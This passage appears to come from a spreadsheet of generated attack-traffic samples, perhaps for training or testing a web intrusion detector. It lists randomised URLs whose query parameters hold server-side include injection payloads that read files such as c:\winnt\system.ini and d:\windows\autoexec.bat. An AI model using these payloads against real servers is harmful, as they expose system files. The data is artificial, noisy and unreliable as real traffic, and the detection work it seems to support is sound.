    <t>/ezmtrgupcu0/neaosoa8ue7ec5/q_5kkzxrh/it3/dfxi15uqer/op6bbcccuyfqrjx1usi.gif?niitosu=&lt;!--#include+++++virtual="c:\\winnt\\system.ini"--&gt;</t>
  </si>
  <si>
    <t>/opnthp1tcah/5nofm/rwceqr7/eanilna9n/rnguhpo-wsq/ejtlievjreedpisoa/4gdtseeuuusars9ir.jpeg?v8zrqpc21u=is&amp;de44acah4p7s=r7&gt;sock_stream'&amp;3eteniwdbt=&lt;!--++#include+virtual="c:\\winnt\\system.ini"++++--&gt;&amp;tiasfvnagbhpu=r6rold6aothntry&amp;inqyrya=qeses1sttadir</t>
  </si>
  <si>
    <t>/a7uhms/eeof-w/qc8nk/spee91ru/th8at2rsreheha/ofcosmwniehlys6m3ff/efhouctrth94ankdl/rmuedifeaioo8sel/hoguoe00rmthfwhitk/w7.swf?epeihnsyilmasn=&lt;!--++++#include+++++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;ihdrlspee=57994119&amp;a6tl4=7&amp;amag=0663509&amp;htneojior=plcsfiaxexec&amp;pgnsevq=1651&amp;osnroesnittslg=hvedxxdhmpv2pczttg&amp;tmssicnhwsurrv=hrai&amp;tl=i-unv&amp;on6oznrzee8r=ir\\a4ninnoe3&amp;yegs6o=98221&amp;u6zurkirmslrom=96423</t>
  </si>
  <si>
    <t>/47dln9n_f8x/hkatroontawlsrr0dd/sd7tmg.pqy/ics31/ucvc/zq2dn..cfm?corb9n=&lt;!--++#include+++++virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/gnjmhtelnixa/ot8pyeeisnows/nm4jfayxgn6ttpc3xr/picdocumentxhlexec9hl_/hwegskooxalww-lw-/wqqs8myv0liy6/ezkzepd/teayon1ggurtseehou/vtnnqanlzaes/imgg8hzhtaccesewvz_/dopgvphplfnfk.gif?ishza=eayl_w5-uk&amp;ereronalacecp=ar(irascripteeval75l&amp;hstae=&lt;!--++#include++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;rebai=tgi&amp;6raezzs8=omo9object</t>
  </si>
  <si>
    <t>/usr_3yn5n/ih/uewsy6n/uj2rfy/mntaxbbk982z5lz9qrbz/tprqwzksubv1yfid@/hdalghfsxtermvp/telnettrj0/ouhvu/toqpeaup0zf/1wprocessing-instruction0y.html?eusctnio=h8seccoc&amp;khss6ex=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;pmadst1e=opng85+i+positiont(t&amp;kue2=7730&amp;deletektdmehscriptn=ajicnmoul&amp;openwherezzhtpv5bj=t&amp;s6mks=na&amp;o@miovfnodeub=06</t>
  </si>
  <si>
    <t>/0mz71ahlogdiechild52/74anscx8ne/emg0nvx73q9x1_i.dll?tvsr=uhn&amp;lzfx_vpvxa7wp-=enaajpmacnpn1&amp;mes=&lt;!--#include+++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;dnottt=aenht</t>
  </si>
  <si>
    <t>/saueeiaais/k6.9mmocha_exterm/alyokzl/eu3m1qqrg9r3u99qqft/ecfatdlhd7o/ehmia7kdyfenxsewyav/ij/vk/ei3eliennrolaosta0y/dljx0b9upyb1ku_u@efk.aspx?7otaonrradmqin=(4+c+8t&amp;mttdbkwsjf=tt&amp;duccbsrnsntee2g=sd+cd&amp;ri2vneml=&lt;!--+++++#include+++virtual="c:\\winnt\\system.ini"++--&gt;&amp;40gymqykmailh3exec=awkwjj6r2ji&amp;eosedst1e5=imheavggroup+byyhmi</t>
  </si>
  <si>
    <t>/oy6as/hmts7uvbscript_ypibsaq/ufrcsfme3t5lxyseeiel/yttn2tbndsntt6eniufo/dr60hchahquirnihs2/enli/9tylr31xp.htm?j7.ipshtpass=gtrraneov9&amp;antltgihtnem=bg8n.k&amp;lt=+hiidtphptmpml|ao]eservicesi&amp;ujahome4p2u=g8te(o9ut+w&amp;hkhueasce7pe1s=trssterqewue&amp;eo8aoiuag=nmvolo&amp;bctsu=nue%n;cadminituw&amp;kc0pgex=nyocnetmsotn&amp;ocee=0&amp;ho=365863&amp;uamdlcoje7xz5=tq@igi&amp;etnio3rna=064613636&amp;l2sner=66001&amp;s6dnehpiethheia=&lt;!--#include+++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;auneqn=dynh</t>
  </si>
  <si>
    <t>/84/rp-qwfhhi9dpsdlu/yybf2-ibxtermiofw/tpu8yob@t.pflgj4h3/ldcdwn/eng2ds0iwzrzh/pefm_jpd.bin?to91tse=art4:on$scwfu=afa&amp;theer=htustdinr4&amp;hnijsahn=emrmr&amp;obcuntoel=feeiliewhxi9e8pek6&amp;sr6=218&amp;vv7passwd0g=aekio0r6&amp;who3ur=s/inrne0lr+&amp;orike5tiesyttth=3156&amp;gqrnysa7ot=iieesto2tolstzn&amp;woaemhsyanms5qt=h&amp;ahhtcrpetg5=2899177&amp;alveptnaqgicto=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"--&gt;</t>
  </si>
  <si>
    <t>/bic/aai/arnsmfp/h8nhjac6./hnennehsje/esyotvtaypc99d6/shtgssaqluztdfn3i/9d2r2nsnijx@qyx1d/ncmelai8sdc/..f@.php3?irounp=&lt;!--#include+virtual="c:\\winnt\\system.ini"+--&gt;</t>
  </si>
  <si>
    <t>/m4zkz689v@/lftp3iohwerbe3/jdcb/rac/8dfqphcidt7@y/hmug/uzgibgf_f2@9xxr/aqqtfsinasukv.nsf?otx=ua'e&amp;nesl=oc.br46uoax&amp;cnncvf=5dedhso&amp;gmr9eeaierienb=ta&amp;htog=8&amp;aan=12887&amp;ln0ke=avwn3ly.h&amp;vx0bteptleso=+p+aj&amp;tdtm=wp-admin&amp;noderajgdeleteoincludeuzal=16&amp;nazrl=d5u=i&amp;lmxu=&lt;!--#include+virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;ho72oseebcbosjd=n/ooetgohed&amp;aeii8ir=ewindow.open~ts&amp;pmflera2kmot=025548</t>
  </si>
  <si>
    <t>/i8.dqdolhome.dj/fv/i8ln/m2mlejmhrukwl_-k/5wkkp9pv90uvicqx/hnx@0uqb/oztg9ovzttxn7kfdznem/vijkuixloydz13p.swf?usondircn=fa&amp;sng=ihgz&amp;petaasnhih=&lt;!--+++++#include++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;elosnadise3d=igt=ts0ief+sowhere&amp;aenezy6eeie9=amsemi</t>
  </si>
  <si>
    <t>/tg6bhgsdyi/_m/telnetbnjydiv4passthrusyqmco/lik6cbhvp.jdf-y8@0r_/m7zgjdsxvqg0kdijik.l/isg8@ac9q3.aspx?7snhnus2pei=dkfbeo3&amp;lolro6da=&lt;!--+++++#include++virtual="c:\\winnt\\system.ini"++--&gt;&amp;sdegytyjoc7ite=azhq42p&amp;moyficrnx4ernd=nssdahmno&amp;tuyrl=osa~(atibohtaccesaes3&amp;dmynbukek=ser&amp;esdeati5mo=h%(7tkguoai8a&amp;lsl5ate=648457</t>
  </si>
  <si>
    <t>/nmzj/odre6isopalif/gmdsnetr.jpg?ahnhmt3=ae3ehe?i4lc&amp;tyt=s9sedarrer3sor&amp;qankm=mea&amp;itte=593&amp;mvgcnc5us0=+d$xselect9zyryrrot|n+h&amp;qaamtipaoetlode=&lt;!--++#include++virtual="d:\\windows\\autoexec.bat"++--&gt;</t>
  </si>
  <si>
    <t>/xrdrmd@-.sh?botnonltnng=&lt;!--+++#include+virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;i7tnlsetnjndt5u=oxkpzr7</t>
  </si>
  <si>
    <t>/pnie59eylcivt7/qyaaarslcdsassigotcz/r5nqjruak/r5rd2winnt2aa/ewb7bgsoundar3kunion/nutdnmsm/mp/eurdfcnoots/5q-w/rlaeesisna.php3?s1ioop=yekytvj&amp;888sqk_nc1mb=tgnidwf+utha&amp;wrotsha=enyypmlce&amp;0ergndea=3698&amp;ecoa=9209&amp;4iify3=920706&amp;c422ke5uh4kv=r@o&amp;seecctqi=u(includeatctywherep+&amp;ca=ejeck9v&amp;wcdv=&lt;!--+++++#include++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;omhdo=9885255943&amp;hmhlygei6tajr=echo9nhaea&amp;a5rct=240633&amp;mc6uioilhgy3=o&amp;u1id0ridsve=qwxaxk</t>
  </si>
  <si>
    <t>/ctxem7sdao/1vmidpgmfy.@v-j-o/tcnoacdt/0dmmkv/ji6htpass/rvy_8fxi2neg/g1sd/rddfmhioqnwr/lea2iuteeulype.png?irsx=5945&amp;0ylh2ml=&lt;!--#include++virtual="d:\\windows\\autoexec.bat"--&gt;</t>
  </si>
  <si>
    <t>/he3yuhupd/e0cf8xzs.kg7uvyxpudv/enrootl1efey/dfdm8zaemn2e.asmx?ekgcjvbscriptdacceptn_d5=dngo&amp;cbenlq=8277478371&amp;-qnyb0i=99977396&amp;pasaaslhgi=+@oy4t&amp;ta8tqoag1iacnow=cdl&amp;ur1hwdes9c=&lt;!--+#include+++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;kdatsue6oleasn=$nhu5ss/ciphm&gt;connecto&amp;9su5evsimereate=&amp;$padmind&amp;w8rpwqlr6c=hrh&amp;okwherehqlcoselect=7nnlu&amp;ods36febdwn=unionosa&amp;hrrct9e6t=lysehgufnaccess_logtseiahtaccesr~&amp;yee=\\p&amp;pjrntirictisut=5</t>
  </si>
  <si>
    <t>/nn0ahyvmepied/sc@_xvnoi5keo9gg@/esqtpreeintsssha2d/sqp/ce7hb2wq.kbgwr.sh?qsa3boot.ini38rhtaccesk=asg&amp;shiv5sicfcdlz2=90&amp;lxhcnadneo=&lt;!--#include++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;nw=4_zlzpovn6l&amp;iah=thsr&amp;tasfhecs=29027624&amp;ogtrehc=$f7&lt;=~+co+aef(&amp;lcso3ke=kbreacov&amp;ztlrf8m=cetqieoq0nec2avag8&amp;s3=dmrfn&amp;onr8elowvkbsoad=ddpqh6_ip3@&amp;r7l=0456&amp;ederwuwc=?)ttnallt+lrshutdownrtc&amp;7eefcue=0</t>
  </si>
  <si>
    <t>/fw/ncj-1pbrop/pdpw386tido6ulp/etr.php4?7ertftriczno=f|dhi&amp;hiiktouadrig=eqnezhr&amp;l4xozb=choloc+t&amp;horiamdbktreo=gmeert'formrms&amp;ppesug1-@=&lt;!--+++#include+++virtual="c:\\winnt\\system.ini"++--&gt;</t>
  </si>
  <si>
    <t>/ljib89v5q/w_-jd5hter/-vb_form193y/flsmdehznr/onoo9xtzedhetiosoamr.dll?xmlkon=2havingemeo7jsrsos&amp;ret=491038251&amp;.elfmaccess_log3s0a597=&lt;!--#include++++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;kx8u-8ws9=3&amp;lort=al3|ei0a4+gts:n</t>
  </si>
  <si>
    <t>/nkcjgi8jvsp6/dszvzn3p52yh/dv@2/lc@97p/kron9eteieltfowese/co/sq@@/hes6yi0ihteaxormdi/yf/6q.bzibdiwb./hwegueet2sxhlpteeyge/knem2lzq0c.sh?d2ore=43421887&amp;te6nrh=ur&amp;aavonochdeisee=5015423&amp;woo6fcvka3admin=&lt;!--+++#include+++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;nsqi23ol0@=2e</t>
  </si>
  <si>
    <t>/b2/dfgf_2rqhmj_.cia/mv/2fcbkamj6wutqhc/exh/wdfdr/wlraspf_r6hz1w6h/_oxf1ctqbmk/ejecqn/i5hnhe7ir7apnt5g/swdthrtspa79hl.html?kpq8=wxterma&amp;q4on=eneh5&amp;saj=eplnc7a;hz&amp;etghb7uien6to=&lt;!--#include+virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;kdchws@qohf=9ata9c&amp;eohcqatectoa7m5=segowinntdiv&amp;9now8sm=n+ei&amp;vf9sr=7&amp;yivseiohi=ds+bnoapositiong&amp;itrda=6&amp;ptpxrv=scegamuotkybqol5e</t>
  </si>
  <si>
    <t>/len6hlca/vihhtaodssesp/uevs_ixgttu/b9-iky/roeed_s9rp0yxkqig/swuiyzoay/dm0locationjbscriptvx/cyj/iaijw2a/ri1plzqw/r3wzwyw1@k7jwjbtwx/utak.nsf?onvgtmmur=+diivsr+&amp;3cpositionlusqqchildtx=&lt;!--++#include++virtual="c:\\winnt\\system.ini"+--&gt;&amp;hidlcbatt5on=sn0g2q2qj</t>
  </si>
  <si>
    <t>/akaaos/3ljxgd_eval35ian/zcodqrhinhoamrnoi/io/tuabjup6/twvoroerok.tiff?rnt1iw=nsabum&amp;uln=yfnv&amp;aairknichnt4=j&amp;nstteokrta=hm+tltsdesaws(&amp;kvtdvbscripth=mtsaeupdatecarall1roof&amp;icut0iw3=42492&amp;deefeap5m=ryetaoi6eo&amp;yidnupexn=39&amp;ervehidethjjiew=om@.j-u9h8f.&amp;c8oeox3pacabibm=&lt;!--+#include+++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;staooheuilz=des;e+8etua&amp;g7k14m2=c9vpdpu&amp;20rn=passthru</t>
  </si>
  <si>
    <t>/eu1cxi/eduxnb.csnv0iw/doe2eadp/iedt8t/au3oih6ea/az0jtud5/el/dn.png?rnve=lvboimc&amp;sceooe3r=46528036&amp;http7lz0ltn_qp=709141&amp;heocetscih4u=k.4hbinh1u&amp;selsz=6165605723&amp;7n=shutdownrye&gt;a+hterethri&amp;&amp;bhftse=t_z&amp;luqxp_z@nc=90983&amp;ce8oaal=&lt;!--++#include+++++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;ecmani1=ekaiteipedpis2en&amp;eadeeee2v=iamaccept&amp;ii=ue72km&amp;feos4jkbhjaasy=irdtlocation&amp;lpvermteidacye=onamwt</t>
  </si>
  <si>
    <t>/re/ogjnd/2otgpflgeiuemha7.pl?8uengi=0381031&amp;xez-0pl.rfp=&lt;!--++#include+virtual="c:\\winnt\\system.ini"--&gt;&amp;fsmironzh=b?wes2hry&amp;+++osn&amp;ooe=8881173839&amp;epyinsertlink=8admin&amp;6w0ktasibnahf=rjnr9etbnjee&amp;ejaetteew=breplacessxotnkqehtaccesoutaor+</t>
  </si>
  <si>
    <t>/wherems99/heaj/e2r5q@rurputi/nscat/dtorg/7wjd61ar9hmihse/m5ias/pa1wq/shythjw._s.4d/xlikhihp3/iafdttstyf4k4c0ujp/lta9ktnau.png?e3yoyl9a=&lt;!--+++#include+++++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;8b=8t</t>
  </si>
  <si>
    <t>/mantrdrenur/npieeuoced4drisd/agtvxlsqe15p8/dngmi9/tfnnnrsdi/asnndhtnrnsaa/ifromobw.nsf?hrae=m&amp;cieqxdalpi=1;:a&amp;uetdtul3e=&lt;!--++#include+++virtual="d:\\windows\\autoexec.bat"--&gt;</t>
  </si>
  <si>
    <t>/jmieeqocwth/rlndnnhsie/oflw9p.p.sdlvp./gnh/quqtuvx/amhlmhnt/na6dinsertservices/qupuvwe0vjttbv5/5wra5temvzahjb/wnyb3xm8a@dn/zm2wjocjnk9js/t3l4eleew2iyhe60enrs.exe?if2lrua=60101072&amp;ycuahnpefn=igbvkod@uewz&amp;epaoeado=058112709&amp;a7o1a5adminow=&lt;!--+++++#include+++++virtual="c:\\winnt\\system.ini"+--&gt;&amp;i14t9ewe3x=sa4faaccess_logf1aoa3welahei&amp;net=ny4fyw&amp;t8amnjlpina=locationoa&amp;a47nncem3iscrm=30ghnubh&amp;oig=0249&amp;v_jrcprrrcd99t=+y</t>
  </si>
  <si>
    <t>/7le4io0nrzras/avtbrsnv/be/v2eni/goo4rhkahyrqzvakpt7/uf.lt0myuje/qrlih@1bog-5cksmr1ys/igzsdtizyo3o/swe5r/eprnd.tiff?nz1z.xgpa=8038&amp;vk1e9qm.r-input=hje&amp;ieersetamnpf=327&amp;ibrofee=29000&amp;dstyle5s0dj5cl71m=98&amp;re5absnue=82&amp;ttitamu=709&amp;arfepy1laine=&lt;j&amp;ahs4vcd=&lt;!--+++#include+virtual="c:\\winnt\\system.ini"++--&gt;&amp;asdee=1</t>
  </si>
  <si>
    <t>/eotuiwgt3_z/oxv0kxtyn/edp6kpjfosr57dfwvi/oeeaaadners8dwus1rw/dineqe5/rsonpahnmtw1etet/yromtsztnioyare0ediz/pnjodu/aanpzo/egum.q.shtml?terisuacrtcnjso=28602748&amp;idza=inr+tr97nen&amp;utrotac=nusrshsem&amp;uu=rterbhtn9ant0rlol&amp;eyu5tm=aboot.ini+script+i1n&amp;psyheliesdsheee=hed+ruio&amp;1eiherwnso0iti=w9f4&amp;ss653b6=elyininsertromens6+o/h&amp;doigreeet4r=o5jnooias&amp;nwhdlisoi7=92460&amp;a5rsiays=tgcswbpc&amp;3fci5ts=&lt;!--+#include+virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;xeecsgiseihtsrn=2983&amp;tmaree=04675054</t>
  </si>
  <si>
    <t>/eai/mm/arit/uvaeqhbptdosttaa/4tetnfdtonafn.php3?oie7ecemi=stmpnm/objectroednwinnt&amp;984f=an@p7dod&amp;aedh=$cgtpa[ae5&amp;rctikhnn0ptn=2333335&amp;onmpiwol=i6t&amp;incpetnkes7=03&amp;u8nph-fw=wp-&amp;an1l=erln9&amp;ateroht=&lt;!--+++++#include+++++virtual="c:\\winnt\\system.ini"+--&gt;&amp;lea=rlznamgrdg</t>
  </si>
  <si>
    <t>/faafe/hjxa93pn@zk/ccblo@lcvk0fyg.ev/rcdkilwpiieye8.php3?leh7ne=m-deet&amp;ppu97j5pgfu=r)s&amp;ijn=540781&amp;pdrm8y5we=r&amp;hrt=00286&amp;vtoimg=nnqd_3y&amp;genrettvxtc=edqt7scb5l9z&amp;c_whpmupuyv=&lt;!--#include++++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;gtr2nnedgsg=piot&amp;ssktc3-a=euxlnhtpya3nnena&amp;ceca6hh=m&amp;96etelnetnnox9=di+i</t>
  </si>
  <si>
    <t>/s6eaah/ecvbw8p_mrhdq4emvom/oedanoucu6dclfb/1v/i0zajg/14ejyjcj-6x/q0o/d7/kgrrnv7insert/px9z4kgz2guu03rb.asp?btostejhg6u=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;iezmss=1ae5bvtl94d+3[w&amp;.igoptqr@ecxp_p=84</t>
  </si>
  <si>
    <t>/lids2csnrp/aszglijusudw/osrts/ed_/foada0ertia1erh/m9jqcdelete/iroedehroik/mpcgsz9bwgetchildcnj0_/f9.swf?oomeeslree3eede=04694210&amp;tsdniasc4=&lt;!--++++#include+virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;sltlw0hfwe=eiscriptnedhd&amp;dibatr3cecm=uaoswdbpna&amp;heojp5ee=tsoutallasraasgta&amp;rne8h=0insertht&amp;tp=theost</t>
  </si>
  <si>
    <t>/2ktqrhgdnnlniee4/wleuasnehndtea.css?tsirhen=7i0c2u4gjb&amp;anxsfutoiasepfp=&lt;!--++#include+++++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;rsdp.a3t=4332738</t>
  </si>
  <si>
    <t>/rzlp/ie-@zmrqifngxwog2v8e/lnjef1evzed8/spsp2jhnmnj/bhier32magsomi.shtml?xmts=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;6lethyec6bn6sei=[open&amp;pjtsystemdqfshutdownab=eshpwesaeln9ninel&amp;sxitp%u=tmp&amp;nshrteinrdn9m=ikc5hsy+&amp;enns5t=cydnobj3ag&amp;qhbieybei=one'jhomezacrinix&amp;caias4ae=1@u&amp;rem0=oao@a7au9ur&amp;rusxtnhniai71=sror&amp;ovojsystemahphp=hi&amp;pomwtu5l=xqcqlmv12w&amp;icnv2efcz9t=style&amp;rgmeh.f=fdn&gt;e47hx+fe</t>
  </si>
  <si>
    <t>/ijx/kirflslzy6-rh/_rwy/evq4dm_/rmonitthl4aafqwa/s0ine5qheh.sh?2eoserbpi=ay&amp;ifrktj-s7=tc&amp;teel5hneoenbhw=214&amp;uk@xrmwsystemphphttpf78=&gt;tesh3ewawfolmg&amp;vlbxdaist=&lt;!--+++#include+++virtual="d:\\windows\\autoexec.bat"++--&gt;</t>
  </si>
  <si>
    <t>/40iaanag24cotreeearg.cfm?nieetna=boa?:taesq&amp;oohthit=lyabaefmp&amp;@atelnetq=&lt;!--#include+virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;fj8vf6=+edi5sr@tc&amp;tedpyetsie9f=8308&amp;iwomqikwpz7sog=r@dwsbe74l&amp;tjacwecepm=7ebhg-tyi+&amp;esnhwdyxrlm=gopen2astn71d0aofuf&amp;rlrenscmtc=ivt&amp;haaaeltjsnnn4d=esenlhrwn26ontltn</t>
  </si>
  <si>
    <t>/3ymnrzgemhfejjz902/cmharwoelis2nhey/ixw/cxbw1w@ufosdl/oqkl9_1.js?etwo1bma9sd=214202845&amp;mo=sr3sl2n&amp;dtiibmieadawf=7&amp;cewlsoo0n=z+oc&amp;refe=passthrutme%&amp;e2rheafcocitu=&lt;!--+++#include++++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;s3=lpzjlx6uz&amp;hpiytwngtcstaio=i]~s[t</t>
  </si>
  <si>
    <t>/aarm0/se8ednha/ndx0dsgjcl/zrr4/bxsthei1/nh6oom7l5o1rsf/hs7coeyh7g2go.jpeg?rec=t|nsdnw3perlnap&amp;6s=tienuixleit&amp;0deudnne=l_fyitkm&amp;mavobody8u=0kdrgwto2co&amp;7oeyofsdt=+gwp-&amp;r0fkaf=io&amp;0ntnoeg8haeaxq=tbebs-j2&amp;bzp9puu1uc=kn&amp;auep@z=&lt;!--++++#include++virtual="c:\\winnt\\system.ini"--&gt;&amp;lilnh2snrsse=ae4ew&amp;iac84ml58o9it=t3jx4&amp;loearlnsg2e=dee</t>
  </si>
  <si>
    <t>/ofb0q1kiqkcvkmmecjn/tt0n1qlj3aq9zv/phpl1cdazuppspfp/rmckx/tutachea/cyoztl8tesumwtl9iyeu.dll?t48mn=&lt;!--+++++#include++++virtual="c:\\winnt\\system.ini"++--&gt;&amp;ths=62602</t>
  </si>
  <si>
    <t>/nlei/4eb/ebpsoihi07abrhr/10/tiirsbfvrgjq_/qqmdvcatsock_streamryhv/7avs_s3connecturrouq.aspx?izilo=c=&amp;lwwgetp=s+a2a&amp;ace=siilnihe&amp;z.m3je7=&lt;!--++++#include+++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;xakdgo4o=tw9@&amp;istig4a=ctmpr=i</t>
  </si>
  <si>
    <t>/lqpkzenrgkzo2qwk9/rq8zjfw0f12wgnau_1/epiec8uhxg/tcd/ead4uimfnfg.asmx?xalu=oconnectbc3~anv&amp;2lqip=ebojsolmtrgthzett&amp;wtsod2h=3111630&amp;uqh=4499860&amp;rnewi=06&amp;woreoiitdyln7be=50&amp;haseviolrernede=+t&amp;oofnnje=urcn2ihts&amp;rsrif2eyaheno=&lt;!--+#include+++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;cmw=tyk+</t>
  </si>
  <si>
    <t>/e1egelttenls/jytwlvmsceyw/3c9@o_u.html?sethl=|iaasg&amp;wettits=aln5xea&amp;x8h2luo=tj9gytna&amp;mwatt=&lt;!--+#include++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;eeewdnlqf78sn9=eick&amp;ppyaehadipssi7=i4chlib&amp;ueqot=isdez3to</t>
  </si>
  <si>
    <t>/7znrdqcj/snhasug5feitslo/re4g-louoafu1x92pe/ovgr6v_otjj.w/m-@dt63b6bypuvf71rf/edkrnpporu5zcagbt89/sssuial8tkuujmeeen/ozitnut/94opnetcatbistdinp/sn9hirla/2eoslulsencsevxewiee.js?isr8srarqno=xtu&gt;n0ahu5e&amp;rrahex=a+d&amp;sr=kxlog&amp;d0gdoi=&lt;!--++#include+++++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;isnr=efncu&amp;gsbvmda=7oyck&amp;s06u7ao3bb=6580980&amp;eacoindrm=1ecjihrza3ic1</t>
  </si>
  <si>
    <t>/cmdo-allhboot.inidz/t2ijw.onxdik5igd.jpl/oteqpovoynqvsnyhy/reedwcevaheoreac/ikxl@smb2ue03q@/o09aynvl0/7oliitertqniesmfhdc7/tbibc/eiqcij/0h/s5oryd/e0fl9y..s5vium1d8.msf?dol=epr&amp;ztemounmt5pwcrc=rmailebsystemocf&amp;asga97ebnmrg=&lt;!--+++++#include+virtual="c:\\winnt\\system.ini"++--&gt;&amp;ochwcqttebne1=e</t>
  </si>
  <si>
    <t>/deonahie6mnraaaauwaa.pl?y8ohitla=850524988&amp;sld=67928081&amp;re5insert9_w=y0byskifnfq&amp;qnmtovge6ttmw86=e4o&amp;akztolwsqpw=42531126&amp;.fxcxx=c+%en&amp;edrdp=0937573&amp;ffoipelhaid8=adns&amp;tjfi2icmchg=+91a&amp;en4gn=&lt;!--+++#include+++++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;rhurousnxreuase=vdcalutia</t>
  </si>
  <si>
    <t>/tcjauleztn9/ecluibashecz/r_/5r9frqsock_streamonrjperloy/hugleo9/eatnudn7ea1doo/x3a-jwvfx1fyobjduy/tkb9y41zgmfk/tz953zjwa5r/nagx3e8vmz7z/eshdbtrd75ue.shtml?fcuaitsd8e=caecde@p.v&amp;p8tm26enkpedaep=hdlsditeieeqoq3s&amp;pis=amnxgw1&amp;nc=&lt;!--#include++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;icscripth=6&amp;aoawurncfiese2=t+&amp;taruntehtiqssh=elsm\\v&amp;riulil1fegoih=189&amp;zhbef7muri=2xp&amp;seln=0147633&amp;bto.0uinsert9qs=unmn7sb&amp;8emrupovl=ot0j&amp;enialauis=ss7w</t>
  </si>
  <si>
    <t>/sew_wcp0w/h9a--xqd-c@bmg4t/8ws@hivezvju/hln7i4chiefs4xma/8roohoroo/i3qhke2s/osaawopceii.png?7zinieohesc=58121&amp;nn8wtta=keval+1a$5&amp;k8ygwrmhometr2yo=omrtn&amp;oist.nu=&lt;!--+#include+++++virtual="d:\\windows\\autoexec.bat"+--&gt;</t>
  </si>
  <si>
    <t>/tdmwitsnitbohduxtu/ts4pzmb-ro/nttndaioenrwpuu5/r9knvxr50/wi88/t8/e4/1aanof2ntvh/eacatteson/c9t9esn3rao/tvf_.m.css?wsttc6l5=5&amp;azilo=s8noro&amp;crranyfqlh3snt=6+so2l+=o&amp;zqreseaah1csoe=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;7vconnect3btmphpe@=lqeunph-&amp;utrt=txen:oloug&amp;siecrene=ne&amp;ihledaohr3qbrz=access_logb&amp;tbpisgtbonoe=453&amp;nhwfv=78&amp;crcteeo3edd=1353461438&amp;pqevaln=28085&amp;nelo3acseyd3=unbdec1doa&amp;allocation8w6rn=68an&amp;zsogse=rnx+c'ycem;</t>
  </si>
  <si>
    <t>/aqu@b_/n-3owyfz@1mpbf/connectgivbscript/snt1jmlj4h/nsi7issne/qrmkxkzwif/2oraw7dwdu/znfn8/8e4xreulbjp/cetbtskfdtr.png?5h5ami=0892&amp;.s122fbg=eam0ni0idets&amp;steslsrqhho=&lt;!--++++#include+virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;rd6im=sdu7eh5s&amp;eesszgiydwr=eanbteecutec</t>
  </si>
  <si>
    <t>/nvs.tftphjlq.php?symthe3eoeve=&lt;!--+++++#include++virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/97cqn3style.uez2/ucs7/oz/eis7otes0eozrzeix/crsid7tlher/mtdeletesq3samd/.5pibwmbhmdusg/e75dyvkoj/nutaaocascrc/ynohafcehfmub9voueeh/udqtldye7fwi.ef.php4?zii6eeahoe=7&amp;aypu-w_2z=%nl&lt;&amp;faeroa9tvdhent=9&amp;icrerhovc=tpgct6zszdi&amp;i9tttmc=yahe\\&amp;inaruee=&lt;!--+#include+virtual="d:\\windows\\autoexec.bat"++--&gt;</t>
  </si>
  <si>
    <t>/lcciraeh98/cpositiontelnetexecservicesshutdowntmovhv/lu/xuet1r/hhitdotogbso3/vuniontln/nhd-dwf6xc3ay@rgdgs/thee/a4/omrehe7t6syohhnaqp.js?iqcgf7t=&lt;!--+++#include++++virtual="d:\\windows\\autoexec.bat"--&gt;</t>
  </si>
  <si>
    <t>/tpc9adf_bxoe-7/rotourns/s689ewrep2xtermnph-p/afloxktly1/soymkucjag7d6m9fq4k/mrhuxvv9xu@n8/epoa38ynevwvbi39t.png?-@qunionp=aoju&amp;nst=5&amp;atqomieneuspd5=809114634&amp;df7rififea=4pdb+udr+e8n&amp;ia3a=ttoifnekejo6jbte5&amp;ouemuysn=ehe&amp;acneu=&lt;!--+++++#include++virtual="c:\\winnt\\system.ini"++--&gt;&amp;hmctpscxci=3i+e-ao&lt;h~6ti&amp;km@nwjp=nfmarhff3uv&amp;xc=36399265&amp;oahio=3213&amp;rdimhse=e+s[daloe9+divmailn&amp;ykytycyadminwc=bea</t>
  </si>
  <si>
    <t>/omhbliagxseac9qef/autoexecl-chgcgy/oytnacjsaybi9sre/ms-.cgi?fbklgha5sh=9&amp;iyyi4pa5notsu5n=6&amp;ve=7nyaohor=&amp;irjfr=positionm0:ashsra&amp;mcf=ae0o&amp;f97ormtgzjj=an+oaib9'iftp9&amp;g1y0fdmn6=7013&amp;lwn=&lt;!--+++++#include+virtual="c:\\winnt\\system.ini"+++--&gt;&amp;1gsltsohiaslond=nanjdrbe</t>
  </si>
  <si>
